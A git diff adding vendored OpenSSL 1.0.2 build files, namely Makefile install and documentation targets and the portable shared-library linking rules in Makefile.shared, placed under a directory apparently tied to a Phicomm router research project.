+					chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new; \
+					mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/$$i; \
+				fi ); \
+				if expr $(PLATFORM) : 'mingw' > /dev/null; then \
+				(	case $$i in \
+						*crypto*) i=libeay32.dll;; \
+						*ssl*)    i=ssleay32.dll;; \
+					esac; \
+					echo installing $$i; \
+	 				cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				chmod 755 $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new; \
+	 				mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i.new $(INSTALL_PREFIX)$(INSTALLTOP)/bin/$$i ); \
+				fi; \
+			fi; \
+		done; \
+		(	here="`pwd`"; \
+			cd $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR); \
+			$(MAKE) -f $$here/Makefile HERE="$$here" link-shared ); \
+		if [ "$(INSTALLTOP)" != "/usr" ]; then \
+			echo 'OpenSSL shared libraries have been installed in:'; \
+			echo '  $(INSTALLTOP)'; \
+			echo ''; \
+			sed -e '1,/^$$/d' doc/openssl-shared.txt; \
+		fi; \
+	fi
+	cp libcrypto.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libcrypto.pc
+	cp libssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/libssl.pc
+	cp openssl.pc $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/pkgconfig/openssl.pc
+
+install_html_docs:
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	for subdir in apps crypto ssl; do \
+		mkdir -p $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+		for i in doc/$$subdir/*.pod; do \
+			fn=`basename $$i .pod`; \
+			echo "installing html/$$fn.$(HTMLSUFFIX)"; \
+			cat $$i \
+			| sed -r 's/L<([^)]*)(\([0-9]\))?\|([^)]*)(\([0-9]\))?>/L<\1|\3>/g' \
+			| pod2html --podroot=doc --htmlroot=.. --podpath=apps:crypto:ssl \
+			| sed -r 's/<!DOCTYPE.*//g' \
+			> $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir/$$fn.$(HTMLSUFFIX); \
+			$(PERL) util/extract-names.pl < $$i | \
+				grep -v $$filecase "^$$fn\$$" | \
+				(cd $(INSTALL_PREFIX)$(HTMLDIR)/$$subdir; \
+				 while read n; do \
+					PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$(HTMLSUFFIX) "$$n".$(HTMLSUFFIX); \
+				 done); \
+		done; \
+	done
+
+install_docs:
+	@$(PERL) $(TOP)/util/mkdir-p.pl \
+		$(INSTALL_PREFIX)$(MANDIR)/man1 \
+		$(INSTALL_PREFIX)$(MANDIR)/man3 \
+		$(INSTALL_PREFIX)$(MANDIR)/man5 \
+		$(INSTALL_PREFIX)$(MANDIR)/man7
+	@pod2man="`cd ./util; ./pod2mantest $(PERL)`"; \
+	here="`pwd`"; \
+	filecase=; \
+	case "$(PLATFORM)" in DJGPP|Cygwin*|mingw*|darwin*-*-cc) \
+		filecase=-i; \
+	esac; \
+	set -e; for i in doc/apps/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 1 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done; \
+	set -e; for i in doc/crypto/*.pod doc/ssl/*.pod; do \
+		fn=`basename $$i .pod`; \
+		sec=`$(PERL) util/extract-section.pl 3 < $$i`; \
+		echo "installing man$$sec/$$fn.$${sec}$(MANSUFFIX)"; \
+		(cd `$(PERL) util/dirname.pl $$i`; \
+		sh -c "$$pod2man \
+			--section=$$sec --center=OpenSSL \
+			--release=$(VERSION) `basename $$i`") \
+			>  $(INSTALL_PREFIX)$(MANDIR)/man$$sec/$$fn.$${sec}$(MANSUFFIX); \
+		$(PERL) util/extract-names.pl < $$i | \
+			(grep -v $$filecase "^$$fn\$$"; true) | \
+			(grep -v "[	]"; true) | \
+			(cd $(INSTALL_PREFIX)$(MANDIR)/man$$sec/; \
+			 while read n; do \
+				PLATFORM=$(PLATFORM) $$here/util/point.sh $$fn.$${sec}$(MANSUFFIX) "$$n".$${sec}$(MANSUFFIX); \
+			 done); \
+	done
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.shared b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.shared
new file mode 100644
index 0000000..e753f44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile.shared
@@ -0,0 +1,655 @@
+#
+# Helper makefile to link shared libraries in a portable way.
+# This is much simpler than libtool, and hopefully not too error-prone.
+#
+# The following variables need to be set on the command line to build
+# properly
+
+# CC contains the current compiler.  This one MUST be defined
+CC=cc
+CFLAGS=$(CFLAG)
+# LDFLAGS contains flags to be used when temporary object files (when building
+# shared libraries) are created, or when an application is linked.
+# SHARED_LDFLAGS contains flags to be used when the shared library is created.
+LDFLAGS=
+SHARED_LDFLAGS=
+
+NM=nm
+
+# LIBNAME contains just the name of the library, without prefix ("lib"
+# on Unix, "cyg" for certain forms under Cygwin...) or suffix (.a, .so,
+# .dll, ...).  This one MUST have a value when using this makefile to
+# build shared libraries.
+# For example, to build libfoo.so, you need to do the following:
+#LIBNAME=foo
+LIBNAME=
+
+# APPNAME contains just the name of the application, without suffix (""
+# on Unix, ".exe" on Windows, ...).  This one MUST have a value when using
+# this makefile to build applications.
+# For example, to build foo, you need to do the following:
+#APPNAME=foo
+APPNAME=
+
+# OBJECTS contains all the object files to link together into the application.
+# This must contain at least one object file.
+#OBJECTS=foo.o
+OBJECTS=
+
+# LIBEXTRAS contains extra modules to link together with the library.
+# For example, if a second library, say libbar.a needs to be linked into
+# libfoo.so, you need to do the following:
+#LIBEXTRAS=libbar.a
+# Note that this MUST be used when using the link_o targets, to hold the
+# names of all object files that go into the target library.
+LIBEXTRAS=
+
+# LIBVERSION contains the current version of the library.
+# For example, to build libfoo.so.1.2, you need to do the following:
+#LIBVERSION=1.2
+LIBVERSION=
+
+# LIBCOMPATVERSIONS contains the compatibility versions (a list) of
+# the library.  They MUST be in decreasing order.
+# For example, if libfoo.so.1.2.1 is backward compatible with libfoo.so.1.2
+# and libfoo.so.1, you need to do the following:
+#LIBCOMPATVERSIONS=1.2 1
+# Note that on systems that use sonames, the last number will appear as
+# part of it.
+# It's also possible, for systems that support it (Tru64, for example),
+# to add extra compatibility info with more precision, by adding a second
+# list of versions, separated from the first with a semicolon, like this:
+#LIBCOMPATVERSIONS=1.2 1;1.2.0 1.1.2 1.1.1 1.1.0 1.0.0
+LIBCOMPATVERSIONS=
+
+# LIBDEPS contains all the flags necessary to cover all necessary
+# dependencies to other libraries.
+LIBDEPS=
+
+#------------------------------------------------------------------------------
+# The rest is private to this makefile.
+
+SET_X=:
+#SET_X=set -x
+
+top:
+	echo "Trying to use this makefile interactively?  Don't."
+
+CALC_VERSIONS=	\
+	SHLIB_COMPAT=; SHLIB_SOVER=; \
+	if [ -n "$(LIBVERSION)$(LIBCOMPATVERSIONS)" ]; then \
+		prev=""; \
+		for v in `echo "$(LIBVERSION) $(LIBCOMPATVERSIONS)" | cut -d';' -f1`; do \
+			SHLIB_SOVER_NODOT=$$v; \
+			SHLIB_SOVER=.$$v; \
+			if [ -n "$$prev" ]; then \
+				SHLIB_COMPAT="$$SHLIB_COMPAT .$$prev"; \
+			fi; \
+			prev=$$v; \
+		done; \
+	fi
+
+LINK_APP=	\
+  ( $(SET_X);   \
+    LIBDEPS="$${LIBDEPS:-$(LIBDEPS)}"; \
+    LDCMD="$${LDCMD:-$(CC)}"; LDFLAGS="$${LDFLAGS:-$(CFLAGS)}"; \
+    LIBPATH=`for x in $$LIBDEPS; do echo $$x; done | sed -e 's/^ *-L//;t' -e d | uniq`; \
+    LIBPATH=`echo $$LIBPATH | sed -e 's/ /:/g'`; \
+    LD_LIBRARY_PATH=$$LIBPATH:$$LD_LIBRARY_PATH \
+    $${LDCMD} $${LDFLAGS} -o $${APPNAME:=$(APPNAME)} $(OBJECTS) $${LIBDEPS} )
+
+LINK_SO=	\
+  ( $(SET_X);   \
+    LIBDEPS="$${LIBDEPS:-$(LIBDEPS)}"; \
+    SHAREDCMD="$${SHAREDCMD:-$(CC)}"; \
+    SHAREDFLAGS="$${SHAREDFLAGS:-$(CFLAGS) $(SHARED_LDFLAGS)}"; \
+    LIBPATH=`for x in $$LIBDEPS; do echo $$x; done | sed -e 's/^ *-L//;t' -e d | uniq`; \
+    LIBPATH=`echo $$LIBPATH | sed -e 's/ /:/g'`; \
+    LD_LIBRARY_PATH=$$LIBPATH:$$LD_LIBRARY_PATH \
+    $${SHAREDCMD} $${SHAREDFLAGS} \
+	-o $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX \
+	$$ALLSYMSFLAGS $$SHOBJECTS $$NOALLSYMSFLAGS $$LIBDEPS \
+  ) && $(SYMLINK_SO)
+
+SYMLINK_SO=	\
+	if [ -n "$$INHIBIT_SYMLINKS" ]; then :; else \
+		prev=$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX; \
+		if [ -n "$$SHLIB_COMPAT" ]; then \
+			for x in $$SHLIB_COMPAT; do \
+				( $(SET_X); rm -f $$SHLIB$$x$$SHLIB_SUFFIX; \
+				  ln -s $$prev $$SHLIB$$x$$SHLIB_SUFFIX ); \
+				prev=$$SHLIB$$x$$SHLIB_SUFFIX; \
+			done; \
+		fi; \
+		if [ -n "$$SHLIB_SOVER" ]; then \
+			( $(SET_X); rm -f $$SHLIB$$SHLIB_SUFFIX; \
+			  ln -s $$prev $$SHLIB$$SHLIB_SUFFIX ); \
+		fi; \
+	fi
+
+LINK_SO_A=	SHOBJECTS="lib$(LIBNAME).a $(LIBEXTRAS)"; $(LINK_SO)
+LINK_SO_O=	SHOBJECTS="$(LIBEXTRAS)"; $(LINK_SO)
+
+LINK_SO_A_VIA_O=	\
+  SHOBJECTS=lib$(LIBNAME).o; \
+  ALL=$$ALLSYMSFLAGS; ALLSYMSFLAGS=; NOALLSYMSFLAGS=; \
+  ( $(SET_X); \
+    ld $(LDFLAGS) -r -o lib$(LIBNAME).o $$ALL lib$(LIBNAME).a $(LIBEXTRAS) ); \
+  $(LINK_SO) && rm -f lib$(LIBNAME).o
+
+LINK_SO_A_UNPACKED=	\
+  UNPACKDIR=link_tmp.$$$$; rm -rf $$UNPACKDIR; mkdir $$UNPACKDIR; \
+  (cd $$UNPACKDIR; ar x ../lib$(LIBNAME).a) && \
+  ([ -z "$(LIBEXTRAS)" ] || cp $(LIBEXTRAS) $$UNPACKDIR) && \
+  SHOBJECTS=$$UNPACKDIR/*.o; \
+  $(LINK_SO) && rm -rf $$UNPACKDIR
+
+DETECT_GNU_LD=($(CC) -Wl,-V /dev/null 2>&1 | grep '^GNU ld' )>/dev/null
+
+DO_GNU_SO=$(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS='-Wl,--whole-archive'; \
+	NOALLSYMSFLAGS='-Wl,--no-whole-archive'; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-Bsymbolic -Wl,-soname=$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX"
+
+DO_GNU_APP=LDFLAGS="$(CFLAGS) -Wl,-rpath,$(LIBRPATH)"
+
+#This is rather special.  It's a special target with which one can link
+#applications without bothering with any features that have anything to
+#do with shared libraries, for example when linking against static
+#libraries.  It's mostly here to avoid a lot of conditionals everywhere
+#else...
+link_app.:
+	$(LINK_APP)
+
+link_o.gnu:
+	@ $(DO_GNU_SO); $(LINK_SO_O)
+link_a.gnu:
+	@ $(DO_GNU_SO); $(LINK_SO_A)
+link_app.gnu:
+	@ $(DO_GNU_APP); $(LINK_APP)
+
+DO_BEOS_SO=	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS='-Wl,--whole-archive'; \
+	NOALLSYMSFLAGS='-Wl,--no-whole-archive'; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-Bsymbolic -Wl,-soname=$$SHLIB$$SHLIB_SUFFIX"
+
+link_o.beos:
+	@ $(DO_BEOS_SO); $(LINK_SO_O)
+link_a.beos:
+	@ $(DO_BEOS_SO); $(LINK_SO_A)
+
+link_o.bsd:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_SO); else \
+	$(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	LIBDEPS=" "; \
+	ALLSYMSFLAGS="-Wl,-Bforcearchive"; \
+	NOALLSYMSFLAGS=; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -nostdlib"; \
+	fi; $(LINK_SO_O)
+link_a.bsd:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_SO); else \
+	$(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	LIBDEPS=" "; \
+	ALLSYMSFLAGS="-Wl,-Bforcearchive"; \
+	NOALLSYMSFLAGS=; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -nostdlib"; \
+	fi; $(LINK_SO_A)
+link_app.bsd:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_APP); else \
+	LDFLAGS="$(CFLAGS) -Wl,-rpath,$(LIBPATH)"; \
+	fi; $(LINK_APP)
+
+# For Darwin AKA Mac OS/X (dyld)
+# Originally link_o.darwin produced .so, because it was hard-coded
+# in dso_dlfcn module. At later point dso_dlfcn switched to .dylib
+# extension in order to allow for run-time linking with vendor-
+# supplied shared libraries such as libz, so that link_o.darwin had
+# to be harmonized with it. This caused minor controversy, because
+# it was believed that dlopen can't be used to dynamically load
+# .dylib-s, only so called bundle modules (ones linked with -bundle
+# flag). The belief seems to be originating from pre-10.4 release,
+# where dlfcn functionality was emulated by dlcompat add-on. In
+# 10.4 dlopen was rewritten as native part of dyld and is documented
+# to be capable of loading both dynamic libraries and bundles. In
+# order to provide compatibility with pre-10.4 dlopen, modules are
+# linked with -bundle flag, which makes .dylib extension misleading.
+# It works, because dlopen is [and always was] extension-agnostic.
+# Alternative to this heuristic approach is to develop specific
+# MacOS X dso module relying on whichever "native" dyld interface.
+link_o.darwin:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME); \
+	SHLIB_SUFFIX=.dylib; \
+	ALLSYMSFLAGS='-all_load'; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS="$(CFLAGS) `echo $(SHARED_LDFLAGS) | sed s/dynamiclib/bundle/`"; \
+	if [ -n "$(LIBVERSION)" ]; then \
+		SHAREDFLAGS="$$SHAREDFLAGS -current_version $(LIBVERSION)"; \
+	fi; \
+	if [ -n "$$SHLIB_SOVER_NODOT" ]; then \
+		SHAREDFLAGS="$$SHAREDFLAGS -compatibility_version $$SHLIB_SOVER_NODOT"; \
+	fi; \
+	$(LINK_SO_O)
+link_a.darwin:
+	@ $(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME); \
+	SHLIB_SUFFIX=.dylib; \
+	ALLSYMSFLAGS='-all_load'; \
+	NOALLSYMSFLAGS=''; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS)"; \
+	if [ -n "$(LIBVERSION)" ]; then \
+		SHAREDFLAGS="$$SHAREDFLAGS -current_version $(LIBVERSION)"; \
+	fi; \
+	if [ -n "$$SHLIB_SOVER_NODOT" ]; then \
+		SHAREDFLAGS="$$SHAREDFLAGS -compatibility_version $$SHLIB_SOVER_NODOT"; \
+	fi; \
+	SHAREDFLAGS="$$SHAREDFLAGS -install_name $(INSTALLTOP)/$(LIBDIR)/$$SHLIB$(SHLIB_EXT)"; \
+	$(LINK_SO_A)
+link_app.darwin:	# is there run-path on darwin?
+	$(LINK_APP)
+
+link_o.cygwin:
+	@ $(CALC_VERSIONS); \
+	INHIBIT_SYMLINKS=yes; \
+	SHLIB=cyg$(LIBNAME); \
+	base=-Wl,--enable-auto-image-base; \
+	deffile=; \
+	if expr $(PLATFORM) : 'mingw' > /dev/null; then \
+		SHLIB=$(LIBNAME)eay32; base=; \
+		if test -f $(LIBNAME)eay32.def; then \
+			deffile=$(LIBNAME)eay32.def; \
+		fi; \
+	fi; \
+	SHLIB_SUFFIX=.dll; \
+	LIBVERSION="$(LIBVERSION)"; \
+	SHLIB_SOVER=${LIBVERSION:+"-$(LIBVERSION)"}; \
+	ALLSYMSFLAGS='-Wl,--whole-archive'; \
+	NOALLSYMSFLAGS='-Wl,--no-whole-archive'; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared $$base $$deffile -Wl,-s,-Bsymbolic"; \
+	$(LINK_SO_O)
+#for mingw target if def-file is in use dll-name should match library-name
+link_a.cygwin:
+	@ $(CALC_VERSIONS); \
+	INHIBIT_SYMLINKS=yes; \
+	SHLIB=cyg$(LIBNAME); SHLIB_SOVER=-$(LIBVERSION); SHLIB_SUFFIX=.dll; \
+	dll_name=$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX; extras=; \
+	base=-Wl,--enable-auto-image-base; \
+	if expr $(PLATFORM) : 'mingw' > /dev/null; then \
+		case $(LIBNAME) in \
+			crypto) SHLIB=libeay;; \
+			ssl) SHLIB=ssleay;; \
+		esac; \
+		SHLIB_SOVER=32; \
+		extras="$(LIBNAME).def"; \
+		$(PERL) util/mkdef.pl 32 $$SHLIB > $$extras; \
+		base=; [ $(LIBNAME) = "crypto" ] && base=-Wl,--image-base,0x63000000; \
+	fi; \
+	dll_name=$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX; \
+	$(PERL) util/mkrc.pl $$dll_name | \
+		$(CROSS_COMPILE)windres -o rc.o; \
+	extras="$$extras rc.o"; \
+	ALLSYMSFLAGS='-Wl,--whole-archive'; \
+	NOALLSYMSFLAGS='-Wl,--no-whole-archive'; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared $$base -Wl,-s,-Bsymbolic -Wl,--out-implib,lib$(LIBNAME).dll.a $$extras"; \
+	[ -f apps/$$dll_name ] && rm apps/$$dll_name; \
+	[ -f test/$$dll_name ] && rm test/$$dll_name; \
+	$(LINK_SO_A) || exit 1; \
+	rm $$extras; \
+	cp -p $$dll_name apps/; \
+	cp -p $$dll_name test/
+link_app.cygwin:
+	@if expr "$(CFLAGS)" : '.*OPENSSL_USE_APPLINK' > /dev/null; then \
+		LIBDEPS="$(TOP)/crypto/applink.o $${LIBDEPS:-$(LIBDEPS)}"; \
+		export LIBDEPS; \
+	fi; \
+	$(LINK_APP)
+
+link_o.alpha-osf1:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		SHLIB_HIST=`echo "$(LIBCOMPATVERSIONS)" | cut -d';' -f2 | sed -e 's/ */:/'`; \
+		if [ -n "$$SHLIB_HIST" ]; then \
+			SHLIB_HIST="$${SHLIB_HIST}:$(LIBVERSION)"; \
+		else \
+			SHLIB_HIST="$(LIBVERSION)"; \
+		fi; \
+		SHLIB_SOVER=; \
+		ALLSYMSFLAGS='-all'; \
+		NOALLSYMSFLAGS='-none'; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-B,symbolic"; \
+		if [ -n "$$SHLIB_HIST" ]; then \
+			SHAREDFLAGS="$$SHAREDFLAGS -set_version $$SHLIB_HIST"; \
+		fi; \
+	fi; \
+	$(LINK_SO_O)
+link_a.alpha-osf1:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		SHLIB_HIST=`echo "$(LIBCOMPATVERSIONS)" | cut -d';' -f2 | sed -e 's/ */:/'`; \
+		if [ -n "$$SHLIB_HIST" ]; then \
+			SHLIB_HIST="$${SHLIB_HIST}:$(LIBVERSION)"; \
+		else \
+			SHLIB_HIST="$(LIBVERSION)"; \
+		fi; \
+		SHLIB_SOVER=; \
+		ALLSYMSFLAGS='-all'; \
+		NOALLSYMSFLAGS='-none'; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-B,symbolic"; \
+		if [ -n "$$SHLIB_HIST" ]; then \
+			SHAREDFLAGS="$$SHAREDFLAGS -set_version $$SHLIB_HIST"; \
+		fi; \
+	fi; \
+	$(LINK_SO_A)
+link_app.alpha-osf1:
+	@if $(DETECT_GNU_LD); then \
+		$(DO_GNU_APP); \
+	else \
+		LDFLAGS="$(CFLAGS) -rpath $(LIBRPATH)"; \
+	fi; \
+	$(LINK_APP)
+
+link_o.solaris:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		MINUSZ='-z '; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && MINUSZ='-Wl,-z,'; \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		ALLSYMSFLAGS="$${MINUSZ}allextract"; \
+		NOALLSYMSFLAGS="$${MINUSZ}defaultextract"; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX -Wl,-Bsymbolic"; \
+	fi; \
+	$(LINK_SO_O)
+link_a.solaris:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		MINUSZ='-z '; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && MINUSZ='-Wl,-z,'; \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=;\
+		ALLSYMSFLAGS="$${MINUSZ}allextract"; \
+		NOALLSYMSFLAGS="$${MINUSZ}defaultextract"; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX -Wl,-Bsymbolic"; \
+	fi; \
+	$(LINK_SO_A)
+link_app.solaris:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_APP); \
+	else \
+		LDFLAGS="$(CFLAGS) -R $(LIBRPATH)"; \
+	fi; \
+	$(LINK_APP)
+
+# OpenServer 5 native compilers used
+link_o.svr3:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		ALLSYMSFLAGS=''; \
+		NOALLSYMSFLAGS=''; \
+		SHAREDFLAGS="$(CFLAGS) -G -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX"; \
+	fi; \
+	$(LINK_SO_O)
+link_a.svr3:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		ALLSYMSFLAGS=''; \
+		NOALLSYMSFLAGS=''; \
+		SHAREDFLAGS="$(CFLAGS) -G -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX"; \
+	fi; \
+	$(LINK_SO_A_UNPACKED)
+link_app.svr3:
+	@$(DETECT_GNU_LD) && $(DO_GNU_APP); \
+	$(LINK_APP)
+
+# UnixWare 7 and OpenUNIX 8 native compilers used
+link_o.svr5:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHARE_FLAG='-G'; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && SHARE_FLAG='-shared'; \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		ALLSYMSFLAGS=''; \
+		NOALLSYMSFLAGS=''; \
+		SHAREDFLAGS="$(CFLAGS) $${SHARE_FLAG} -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX"; \
+	fi; \
+	$(LINK_SO_O)
+link_a.svr5:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHARE_FLAG='-G'; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && SHARE_FLAG='-shared'; \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		ALLSYMSFLAGS=''; \
+		NOALLSYMSFLAGS=''; \
+		SHAREDFLAGS="$(CFLAGS) $${SHARE_FLAG} -h $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX"; \
+	fi; \
+	$(LINK_SO_A_UNPACKED)
+link_app.svr5:
+	@$(DETECT_GNU_LD) && $(DO_GNU_APP); \
+	$(LINK_APP)
+
+link_o.irix:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		MINUSWL=""; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && MINUSWL="-Wl,"; \
+		ALLSYMSFLAGS="$${MINUSWL}-all"; \
+		NOALLSYMSFLAGS="$${MINUSWL}-none"; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-soname,$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX,-B,symbolic"; \
+	fi; \
+	$(LINK_SO_O)
+link_a.irix:
+	@ if $(DETECT_GNU_LD); then \
+		$(DO_GNU_SO); \
+	else \
+		$(CALC_VERSIONS); \
+		SHLIB=lib$(LIBNAME).so; \
+		SHLIB_SUFFIX=; \
+		MINUSWL=""; \
+		($(CC) -v 2>&1 | grep gcc) > /dev/null && MINUSWL="-Wl,"; \
+		ALLSYMSFLAGS="$${MINUSWL}-all"; \
+		NOALLSYMSFLAGS="$${MINUSWL}-none"; \
+		SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -shared -Wl,-soname,$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX,-B,symbolic"; \
+	fi; \
+	$(LINK_SO_A)
+link_app.irix:
+	@LDFLAGS="$(CFLAGS) -Wl,-rpath,$(LIBRPATH)"; \
+	$(LINK_APP)
+
+# 32-bit PA-RISC HP-UX embeds the -L pathname of libs we link with, so
+# we compensate for it with +cdp ../: and +cdp ./:. Yes, these rewrite
+# rules imply that we can only link one level down in catalog structure,
+# but that's what takes place for the moment of this writing. +cdp option
+# was introduced in HP-UX 11.x and applies in 32-bit PA-RISC link
+# editor context only [it's simply ignored in other cases, which are all
+# ELFs by the way].
+#
+link_o.hpux:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_SO); else \
+	$(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).sl; \
+	expr "$(CFLAGS)" : '.*DSO_DLFCN' > /dev/null && SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS='-Wl,-Fl'; \
+	NOALLSYMSFLAGS=''; \
+	expr $(PLATFORM) : 'hpux64' > /dev/null && ALLSYMSFLAGS='-Wl,+forceload'; \
+	SHAREDFLAGS="$(CFLAGS) $(SHARED_LDFLAGS) -Wl,-B,symbolic,+vnocompatwarnings,-z,+s,+h,$$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX,+cdp,../:,+cdp,./:"; \
+	fi; \
+	rm -f $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX || :; \
+	$(LINK_SO_O) && chmod a=rx $$SHLIB$$SHLIB_SOVER$$SHLIB_SUFFIX
+link_a.hpux:
+	@if $(DETECT_GNU_LD); then $(DO_GNU_SO); else \
+	$(CALC_VERSIONS); \
+	SHLIB=lib$(LIBNAME).sl; \
+	expr $(PLATFORM) : '.*ia64' > /dev/null && SHLIB=lib$(LIBNAME).so; \
+	SHLIB_SUFFIX=; \
+	ALLSYMSFLAGS='-Wl,-Fl'; \
+	NOALLSYMSFLAGS=''; \
+	expr $(PLATFORM) : 'hpux64' > /dev/null && ALLSYMSFLAGS='-Wl,+forceload'; \
